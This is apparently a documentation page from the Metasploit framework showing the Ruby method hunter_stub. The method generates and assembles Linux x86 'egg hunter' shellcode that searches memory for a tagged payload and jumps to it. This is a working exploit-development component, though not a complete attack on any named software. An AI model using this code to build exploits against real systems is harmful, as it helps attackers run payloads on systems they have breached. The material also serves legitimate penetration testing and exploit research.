Module: Rex::Exploitation::Egghunter::Linux::X86

Defined in:
lib/rex/exploitation/egghunter.rb

Constant Summary collapse

Alias = 
ARCH_X86

Instance Method Summary collapse

Instance Method Details

#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object

The egg hunter stub for linux/x86.

Raises:



247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
 
# File 'lib/rex/exploitation/egghunter.rb', line 247

def hunter_stub(payload, badchars = '', opts = {})

  startreg = opts[:startreg]

  raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
  marker = "0x%x" % opts[:eggtag].unpack('V').first

  checksum = checksum_stub(payload, badchars, opts)

  startstub = ''
  if startreg
    if startreg.downcase != 'ecx'
      startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr"
    else
      startstub = "\n\tjmp next_addr"
    end
  end
  startstub << "\n\t" if startstub.length > 0

  assembly = "  cld\n\#{startstub}\ncheck_readable:\n  or cx,0xfff\nnext_addr:\n  inc ecx\n  push 0x43   ; use 'sigaction' syscall\n  pop eax\n  int 0x80\n  cmp al,0xf2\n  je check_readable\n\ncheck_for_tag:\n  ; check that the tag matches once\n  mov eax,\#{marker}\n  mov edi,ecx\n  scasd\n  jne next_addr\n  ; it must match a second time too\n  scasd\n  jne next_addr\n\n  ; check the checksum if the feature is enabled\n\#{checksum}\n\n  ; jump to the payload\n  jmp edi\n"

  assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string

  # return the stub
  assembled_code
end